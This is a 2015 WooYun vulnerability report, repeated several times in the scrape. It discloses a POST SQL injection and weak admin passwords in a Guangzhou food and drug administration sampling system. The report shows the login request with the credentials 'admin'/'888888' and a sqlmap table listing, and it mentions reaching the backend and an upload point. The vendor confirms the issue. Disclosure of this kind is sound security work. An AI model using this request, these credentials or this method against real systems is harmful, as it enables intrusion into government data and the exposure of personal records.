广州市食品药品监督管理局某系统存在POST注入以及后台管理弱口令（大量用户密码信息泄露和企业信息泄漏）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146933

漏洞标题：广州市食品药品监督管理局某系统存在POST注入以及后台管理弱口令（大量用户密码信息泄露和企业信息泄漏）

漏洞作者：路人甲

提交时间：2015-10-15 16:20

修复时间：2015-11-30 15:20

公开时间：2015-11-30 15:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-15：细节已通知厂商并且等待厂商处理中
2015-10-16：厂商已经确认，细节仅向厂商公开
2015-10-26：细节向核心白帽子及相关领域专家公开
2015-11-05：细节向普通白帽子公开
2015-11-15：细节向实习白帽子公开
2015-11-30：细节向公众公开

简要描述：

1. 广州市食品药品监督管理局某系统存在POST注入，（大量用户密码信息泄露和企业信息泄漏）
2. 后台管理弱口令

详细说明：

食品抽样检验管理系统

看到这个就觉得有漏洞，SQLMAP抓包

POST /food/EagleActions/loginAction HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (masking-agent; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/food/jsp/Login.xhtml
Content-Length: 80
Cookie: JSESSIONID=4DB030AF964231A395B04DF72694CA53
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"action":"login","arguments":["admin","888888","2290","","","",""],"params":{}}

虽然不是DBA权限，但还是可以跑出很多信息。

+-------------------------+
| BSE_CHECK_ITEM          |
| BSE_CLASSIFY            |
| BSE_COMPANY             |
| BSE_DEPARTMENT          |
| BSE_EXCEL               |
| BSE_EXCEL_DETAIL        |
| BSE_EXCEL_MODEL         |
| BSE_FOOD                |
| BSE_IMPCORP             |
| BSE_MODEL_ITEM          |
| BSE_PRINTTEMPLE         |
| BSE_PRODUCT_CLASS       |
| BSE_PRODUCT_STANDARD    |
| BSE_REGION              |
| BSE_RESULT_DATE         |
| BSE_RULES               |
| BSE_SAMPLING_TYPE       |
| BSE_ZCH                 |
| EC_CHARTDEF             |
| EC_STAT_CHART           |
| EC_STAT_CHART_GROUP     |
| EG_ATTACHMENT           |
| EG_CHILD_SYSTEM         |
| EG_DATA_TRACING         |
| EG_FUN                  |
| EG_FUNHASRIGHT          |
| EG_FUNRIGHT             |
| EG_FUN_DEV_LOG          |
| EG_FUN_TEST             |
| EG_FUN_TEST_TRACING     |
| EG_GROUP                |
| EG_MESSAGETYPE          |
| EG_MESSAGE_ATTACHMENT   |
| EG_OA_CONTACT           |
| EG_OA_CONTACT_GROUP     |
| EG_ONLINEUSER           |
| EG_POSITION             |
| EG_PREFERENCES          |
| EG_REGION               |
| EG_RIGHT                |
| EG_ROLE                 |
| EG_ROLEHASFUN           |
| EG_ROLEHASFUNRIGHT      |
| EG_ROLEHASPOSITION      |
| EG_ROLEHASRIGHT         |
| EG_ROLEHASUSER          |
| EG_STATE                |
| EG_USER                 |
| EG_USER_LOGIN_LOG       |
| EG_USER_OPERATION_LOG   |
| EG_WORKMAIL             |
| RPT_EMPL_AREA           |
| RPT_EMPL_BILL           |
| RPT_EMPL_BILLSUB        |
| RPT_EMPL_BILLSUB1       |
| RPT_EMPL_DATADICT       |
| RPT_EMPL_DEPT           |
| RPT_EMPL_DW             |
| RPT_EMPL_DWTYPE         |
| RPT_EMPL_EMPLOYEE       |
| RPT_EMPL_EMPLOYEE1      |
| RPT_EMPL_EMPLOYEE2      |
| RPT_EMPL_GROUP          |
| RPT_EMPL_INTBILL        |
| RPT_EMPL_INTBILLSUB     |
| RPT_EMPL_ITEM           |
| RPT_EMPL_MOREPK         |
| RPT_GE_PROPERTY         |
| RPT_REPORTFILE          |
| SM_SAMPLE_REMAIN        |
| SP_ATTACH               |
| SP_CHECK_ITEM           |
| SP_COUNTY_TASK          |
| SP_PERSON               |
| SP_PUNISH               |
| SP_REMAIN_SAMPLE        |
| SP_RESULT_LIST_TEMP     |
| SP_SAMPLE               |
| SP_SAMPLE_BILL          |
| SP_SAMPLING_PLAN        |
| SP_SAMPLING_RESULT      |
| SP_SAMPLING_RESULT_LIST |
| SP_SAMPLING_TASK        |
| SP_SSSB                 |
| SP_TASK_DISTRIBUTE      |
| SP_TASK_FOOD            |
| SP_UNQUALITYINFO        |
| SP_UPLOAD               |
| SP_YS_RESULT            |
| SP_YS_RESULT_LIST       |
| TEMP_SAMPLE             |
| TEMP_TASKNO             |
+-------------------------+

漏洞证明：

利用注入漏洞进入后台，发现基本都是弱口令
有上传点，就不深入了。

修复方案：

赶快修复吧，有可能都被人撸过了。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-10-16 15:19

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：10
正在联系相关网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146933

漏洞标题：广州市食品药品监督管理局某系统存在POST注入以及后台管理弱口令（大量用户密码信息泄露和企业信息泄漏）

相关厂商：广州市食品药品监督管理局

漏洞作者：路人甲

提交时间：2015-10-15 16:20

修复时间：2015-11-30 15:20

公开时间：2015-11-30 15:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146933

漏洞标题：广州市食品药品监督管理局某系统存在POST注入以及后台管理弱口令（大量用户密码信息泄露和企业信息泄漏）

相关厂商：广州市食品药品监督管理局

漏洞作者： 路人甲

提交时间：2015-10-15 16:20

修复时间：2015-11-30 15:20

公开时间：2015-11-30 15:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146933"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云